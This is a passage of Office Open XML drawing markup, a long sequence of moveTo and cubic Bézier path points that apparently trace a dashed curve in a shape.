                    <a:pt x="1261" y="2120"/>
                    <a:pt x="1263" y="2118"/>
                    <a:pt x="1263" y="2115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1262" y="2113"/>
                    <a:pt x="1260" y="2112"/>
                    <a:pt x="1258" y="2112"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1297" y="2104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1291" y="2106"/>
                    <a:pt x="1284" y="2107"/>
                    <a:pt x="1277" y="2109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1275" y="2109"/>
                    <a:pt x="1274" y="2111"/>
                    <a:pt x="1274" y="2113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1275" y="2115"/>
                    <a:pt x="1277" y="2117"/>
                    <a:pt x="1279" y="2116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1286" y="2115"/>
                    <a:pt x="1292" y="2114"/>
                    <a:pt x="1299" y="2112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="2112"/>
                    <a:pt x="1302" y="2110"/>
                    <a:pt x="1302" y="2107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="2105"/>
                    <a:pt x="1299" y="2104"/>
                    <a:pt x="1297" y="2104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1297" y="2104"/>
                    <a:pt x="1297" y="2104"/>
                    <a:pt x="1297" y="2104"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1336" y="2095"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1329" y="2097"/>
                    <a:pt x="1323" y="2098"/>
                    <a:pt x="1316" y="2100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1314" y="2101"/>
                    <a:pt x="1313" y="2103"/>
                    <a:pt x="1313" y="2105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1314" y="2107"/>
                    <a:pt x="1316" y="2108"/>
                    <a:pt x="1318" y="2108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1325" y="2106"/>
                    <a:pt x="1331" y="2105"/>
                    <a:pt x="1338" y="2103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="2102"/>
                    <a:pt x="1341" y="2100"/>
                    <a:pt x="1341" y="2098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1340" y="2096"/>
                    <a:pt x="1338" y="2095"/>
                    <a:pt x="1336" y="2095"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1374" y="2084"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1368" y="2086"/>
                    <a:pt x="1361" y="2088"/>
                    <a:pt x="1355" y="2090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1353" y="2091"/>
                    <a:pt x="1352" y="2093"/>
                    <a:pt x="1352" y="2095"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1353" y="2097"/>
                    <a:pt x="1355" y="2098"/>
                    <a:pt x="1357" y="2098"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1364" y="2096"/>
                    <a:pt x="1370" y="2094"/>
                    <a:pt x="1377" y="2092"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="2091"/>
                    <a:pt x="1380" y="2089"/>
                    <a:pt x="1379" y="2087"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1379" y="2085"/>
                    <a:pt x="1376" y="2084"/>
                    <a:pt x="1374" y="2084"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1412" y="2072"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1406" y="2074"/>
                    <a:pt x="1400" y="2076"/>
                    <a:pt x="1393" y="2079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1391" y="2079"/>
                    <a:pt x="1390" y="2081"/>
                    <a:pt x="1391" y="2084"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1391" y="2086"/>
                    <a:pt x="1394" y="2087"/>
                    <a:pt x="1396" y="2086"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1402" y="2084"/>
                    <a:pt x="1408" y="2082"/>
                    <a:pt x="1415" y="2080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="2079"/>
                    <a:pt x="1418" y="2077"/>
                    <a:pt x="1417" y="2075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1417" y="2073"/>
                    <a:pt x="1414" y="2072"/>
                    <a:pt x="1412" y="2072"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1450" y="2059"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1444" y="2061"/>
                    <a:pt x="1437" y="2063"/>
                    <a:pt x="1431" y="2066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1429" y="2066"/>
                    <a:pt x="1428" y="2069"/>
                    <a:pt x="1429" y="2071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1429" y="2073"/>
                    <a:pt x="1432" y="2074"/>
                    <a:pt x="1434" y="2073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1440" y="2071"/>
                    <a:pt x="1446" y="2068"/>
                    <a:pt x="1453" y="2066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1455" y="2065"/>
                    <a:pt x="1456" y="2063"/>
                    <a:pt x="1455" y="2061"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1454" y="2059"/>
                    <a:pt x="1452" y="2058"/>
                    <a:pt x="1450" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1450" y="2059"/>
                    <a:pt x="1450" y="2059"/>
                    <a:pt x="1450" y="2059"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1487" y="2044"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1481" y="2046"/>
                    <a:pt x="1474" y="2049"/>
                    <a:pt x="1468" y="2051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1466" y="2052"/>
                    <a:pt x="1465" y="2054"/>
                    <a:pt x="1466" y="2056"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1467" y="2059"/>
                    <a:pt x="1469" y="2060"/>
                    <a:pt x="1471" y="2059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1477" y="2056"/>
                    <a:pt x="1484" y="2054"/>
                    <a:pt x="1490" y="2051"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1492" y="2050"/>
                    <a:pt x="1493" y="2048"/>
                    <a:pt x="1492" y="2046"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1491" y="2044"/>
                    <a:pt x="1489" y="2043"/>
                    <a:pt x="1487" y="2044"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1523" y="2027"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1517" y="2030"/>
                    <a:pt x="1511" y="2033"/>
                    <a:pt x="1505" y="2036"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1503" y="2037"/>
                    <a:pt x="1502" y="2039"/>
                    <a:pt x="1503" y="2041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1504" y="2043"/>
                    <a:pt x="1506" y="2044"/>
                    <a:pt x="1508" y="2043"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1514" y="2040"/>
                    <a:pt x="1520" y="2037"/>
                    <a:pt x="1526" y="2035"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="2034"/>
                    <a:pt x="1529" y="2031"/>
                    <a:pt x="1528" y="2029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1527" y="2027"/>
                    <a:pt x="1525" y="2026"/>
                    <a:pt x="1523" y="2027"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="2010"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1553" y="2013"/>
                    <a:pt x="1547" y="2016"/>
                    <a:pt x="1541" y="2019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1539" y="2020"/>
                    <a:pt x="1538" y="2022"/>
                    <a:pt x="1539" y="2024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1540" y="2026"/>
                    <a:pt x="1542" y="2027"/>
                    <a:pt x="1544" y="2026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1550" y="2023"/>
                    <a:pt x="1556" y="2020"/>
                    <a:pt x="1562" y="2017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="2016"/>
                    <a:pt x="1565" y="2013"/>
                    <a:pt x="1564" y="2011"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1563" y="2009"/>
                    <a:pt x="1560" y="2009"/>
                    <a:pt x="1558" y="2010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1558" y="2010"/>
                    <a:pt x="1558" y="2010"/>
                    <a:pt x="1558" y="2010"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="1991"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1588" y="1994"/>
                    <a:pt x="1582" y="1997"/>
                    <a:pt x="1576" y="2000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574" y="2001"/>
                    <a:pt x="1573" y="2004"/>
                    <a:pt x="1574" y="2006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1575" y="2008"/>
                    <a:pt x="1578" y="2008"/>
                    <a:pt x="1580" y="2007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1586" y="2004"/>
                    <a:pt x="1592" y="2001"/>
                    <a:pt x="1597" y="1997"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="1996"/>
                    <a:pt x="1600" y="1994"/>
                    <a:pt x="1599" y="1992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1598" y="1990"/>
                    <a:pt x="1595" y="1989"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1628" y="1970"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1622" y="1974"/>
                    <a:pt x="1616" y="1977"/>
                    <a:pt x="1611" y="1980"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="1982"/>
                    <a:pt x="1608" y="1984"/>
                    <a:pt x="1609" y="1986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1610" y="1988"/>
                    <a:pt x="1613" y="1988"/>
                    <a:pt x="1615" y="1987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1620" y="1984"/>
                    <a:pt x="1626" y="1980"/>
                    <a:pt x="1632" y="1977"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1634" y="1976"/>
                    <a:pt x="1634" y="1973"/>
                    <a:pt x="1633" y="1971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1632" y="1970"/>
                    <a:pt x="1630" y="1969"/>
                    <a:pt x="1628" y="1970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1628" y="1970"/>
                    <a:pt x="1628" y="1970"/>
                    <a:pt x="1628" y="1970"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="1949"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1656" y="1952"/>
                    <a:pt x="1650" y="1956"/>
                    <a:pt x="1644" y="1959"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="1961"/>
                    <a:pt x="1642" y="1963"/>
                    <a:pt x="1643" y="1965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1644" y="1967"/>
                    <a:pt x="1647" y="1967"/>
                    <a:pt x="1649" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1654" y="1963"/>
                    <a:pt x="1660" y="1959"/>
                    <a:pt x="1666" y="1955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="1954"/>
                    <a:pt x="1668" y="1951"/>
                    <a:pt x="1667" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1665" y="1948"/>
                    <a:pt x="1663" y="1947"/>
                    <a:pt x="1661" y="1949"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="1926"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1688" y="1930"/>
                    <a:pt x="1683" y="1933"/>
                    <a:pt x="1677" y="1937"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="1938"/>
                    <a:pt x="1675" y="1941"/>
                    <a:pt x="1677" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1678" y="1945"/>
                    <a:pt x="1680" y="1945"/>
                    <a:pt x="1682" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1688" y="1940"/>
                    <a:pt x="1693" y="1936"/>
                    <a:pt x="1698" y="1932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1700" y="1931"/>
                    <a:pt x="1701" y="1928"/>
                    <a:pt x="1699" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1698" y="1925"/>
                    <a:pt x="1695" y="1924"/>
                    <a:pt x="1694" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1694" y="1926"/>
                    <a:pt x="1694" y="1926"/>
                    <a:pt x="1694" y="1926"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="1902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1906"/>
                    <a:pt x="1715" y="1910"/>
                    <a:pt x="1710" y="1914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1708" y="1915"/>
                    <a:pt x="1708" y="1918"/>
                    <a:pt x="1709" y="1919"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1710" y="1921"/>
                    <a:pt x="1713" y="1921"/>
                    <a:pt x="1715" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1916"/>
                    <a:pt x="1725" y="1912"/>
                    <a:pt x="1730" y="1908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1732" y="1906"/>
                    <a:pt x="1732" y="1904"/>
                    <a:pt x="1731" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730" y="1900"/>
                    <a:pt x="1727" y="1900"/>
                    <a:pt x="1725" y="1902"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="1876"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1881"/>
                    <a:pt x="1746" y="1885"/>
                    <a:pt x="1741" y="1889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1739" y="1890"/>
                    <a:pt x="1739" y="1893"/>
                    <a:pt x="1740" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1742" y="1896"/>
                    <a:pt x="1744" y="1897"/>
                    <a:pt x="1746" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1891"/>
                    <a:pt x="1756" y="1887"/>
                    <a:pt x="1761" y="1882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1763" y="1881"/>
                    <a:pt x="1763" y="1878"/>
                    <a:pt x="1762" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="1875"/>
                    <a:pt x="1758" y="1875"/>
                    <a:pt x="1756" y="1876"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="1850"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1781" y="1854"/>
                    <a:pt x="1776" y="1859"/>
                    <a:pt x="1771" y="1863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1770" y="1865"/>
                    <a:pt x="1770" y="1867"/>
                    <a:pt x="1771" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="1870"/>
                    <a:pt x="1775" y="1871"/>
                    <a:pt x="1777" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1782" y="1865"/>
                    <a:pt x="1787" y="1860"/>
                    <a:pt x="1792" y="1856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1793" y="1854"/>
                    <a:pt x="1793" y="1852"/>
                    <a:pt x="1792" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="1848"/>
                    <a:pt x="1788" y="1848"/>
                    <a:pt x="1786" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="1850"/>
                    <a:pt x="1786" y="1850"/>
                    <a:pt x="1786" y="1850"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="1822"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="1827"/>
                    <a:pt x="1806" y="1832"/>
                    <a:pt x="1801" y="1836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1838"/>
                    <a:pt x="1799" y="1840"/>
                    <a:pt x="1801" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="1843"/>
                    <a:pt x="1805" y="1844"/>
                    <a:pt x="1806" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="1837"/>
                    <a:pt x="1816" y="1833"/>
                    <a:pt x="1821" y="1828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1822" y="1826"/>
                    <a:pt x="1822" y="1824"/>
                    <a:pt x="1821" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="1821"/>
                    <a:pt x="1817" y="1821"/>
                    <a:pt x="1815" y="1822"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="1794"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1838" y="1799"/>
                    <a:pt x="1834" y="1803"/>
                    <a:pt x="1829" y="1808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1828" y="1810"/>
                    <a:pt x="1828" y="1812"/>
                    <a:pt x="1829" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="1815"/>
                    <a:pt x="1833" y="1815"/>
                    <a:pt x="1835" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839" y="1809"/>
                    <a:pt x="1844" y="1804"/>
                    <a:pt x="1849" y="1799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="1798"/>
                    <a:pt x="1850" y="1795"/>
                    <a:pt x="1848" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="1792"/>
                    <a:pt x="1844" y="1792"/>
                    <a:pt x="1843" y="1794"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="1764"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1865" y="1769"/>
                    <a:pt x="1861" y="1774"/>
                    <a:pt x="1856" y="1779"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1855" y="1781"/>
                    <a:pt x="1855" y="1783"/>
                    <a:pt x="1857" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="1786"/>
                    <a:pt x="1861" y="1786"/>
                    <a:pt x="1862" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867" y="1779"/>
                    <a:pt x="1871" y="1774"/>
                    <a:pt x="1876" y="1769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1877" y="1768"/>
                    <a:pt x="1877" y="1765"/>
                    <a:pt x="1875" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="1762"/>
                    <a:pt x="1871" y="1762"/>
                    <a:pt x="1870" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1870" y="1764"/>
                    <a:pt x="1870" y="1764"/>
                    <a:pt x="1870" y="1764"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="1734"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="1739"/>
                    <a:pt x="1887" y="1744"/>
                    <a:pt x="1883" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1881" y="1751"/>
                    <a:pt x="1881" y="1753"/>
                    <a:pt x="1883" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1885" y="1756"/>
                    <a:pt x="1887" y="1756"/>
                    <a:pt x="1889" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1893" y="1749"/>
                    <a:pt x="1897" y="1744"/>
                    <a:pt x="1901" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1903" y="1737"/>
                    <a:pt x="1903" y="1734"/>
                    <a:pt x="1901" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="1732"/>
                    <a:pt x="1897" y="1732"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="1702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1916" y="1707"/>
                    <a:pt x="1912" y="1713"/>
                    <a:pt x="1908" y="1718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1906" y="1720"/>
                    <a:pt x="1907" y="1722"/>
                    <a:pt x="1908" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="1725"/>
                    <a:pt x="1913" y="1724"/>
                    <a:pt x="1914" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1918" y="1717"/>
                    <a:pt x="1922" y="1712"/>
                    <a:pt x="1926" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1927" y="1705"/>
                    <a:pt x="1927" y="1702"/>
                    <a:pt x="1925" y="1701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="1700"/>
                    <a:pt x="1921" y="1700"/>
                    <a:pt x="1920" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1920" y="1702"/>
                    <a:pt x="1920" y="1702"/>
                    <a:pt x="1920" y="1702"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="1669"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="1675"/>
                    <a:pt x="1935" y="1680"/>
                    <a:pt x="1931" y="1686"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1930" y="1688"/>
                    <a:pt x="1931" y="1690"/>
                    <a:pt x="1932" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="1693"/>
                    <a:pt x="1937" y="1692"/>
                    <a:pt x="1938" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="1685"/>
                    <a:pt x="1946" y="1680"/>
                    <a:pt x="1950" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1951" y="1672"/>
                    <a:pt x="1950" y="1670"/>
                    <a:pt x="1949" y="1668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="1667"/>
                    <a:pt x="1944" y="1668"/>
                    <a:pt x="1943" y="1669"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="1636"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="1642"/>
                    <a:pt x="1958" y="1647"/>
                    <a:pt x="1954" y="1653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="1655"/>
                    <a:pt x="1953" y="1657"/>
                    <a:pt x="1955" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="1660"/>
                    <a:pt x="1960" y="1659"/>
                    <a:pt x="1961" y="1657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="1652"/>
                    <a:pt x="1968" y="1646"/>
                    <a:pt x="1972" y="1640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1973" y="1639"/>
                    <a:pt x="1972" y="1636"/>
                    <a:pt x="1971" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1969" y="1634"/>
                    <a:pt x="1966" y="1634"/>
                    <a:pt x="1965" y="1636"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="1602"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1982" y="1608"/>
                    <a:pt x="1979" y="1614"/>
                    <a:pt x="1976" y="1619"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1974" y="1621"/>
                    <a:pt x="1975" y="1624"/>
                    <a:pt x="1977" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="1626"/>
                    <a:pt x="1981" y="1625"/>
                    <a:pt x="1982" y="1623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986" y="1618"/>
                    <a:pt x="1989" y="1612"/>
                    <a:pt x="1993" y="1606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1994" y="1604"/>
                    <a:pt x="1993" y="1602"/>
                    <a:pt x="1991" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="1599"/>
                    <a:pt x="1987" y="1600"/>
                    <a:pt x="1986" y="1602"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="1567"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2002" y="1573"/>
                    <a:pt x="1999" y="1579"/>
                    <a:pt x="1996" y="1585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1995" y="1587"/>
                    <a:pt x="1995" y="1589"/>
                    <a:pt x="1997" y="1590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="1591"/>
                    <a:pt x="2002" y="1591"/>
                    <a:pt x="2003" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2006" y="1583"/>
                    <a:pt x="2009" y="1577"/>
                    <a:pt x="2012" y="1571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2013" y="1569"/>
                    <a:pt x="2013" y="1567"/>
                    <a:pt x="2011" y="1565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2009" y="1564"/>
                    <a:pt x="2006" y="1565"/>
                    <a:pt x="2005" y="1567"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="1532"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2021" y="1538"/>
                    <a:pt x="2018" y="1543"/>
                    <a:pt x="2015" y="1549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2014" y="1551"/>
                    <a:pt x="2014" y="1554"/>
                    <a:pt x="2016" y="1555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="1556"/>
                    <a:pt x="2021" y="1555"/>
                    <a:pt x="2022" y="1553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2025" y="1547"/>
                    <a:pt x="2028" y="1541"/>
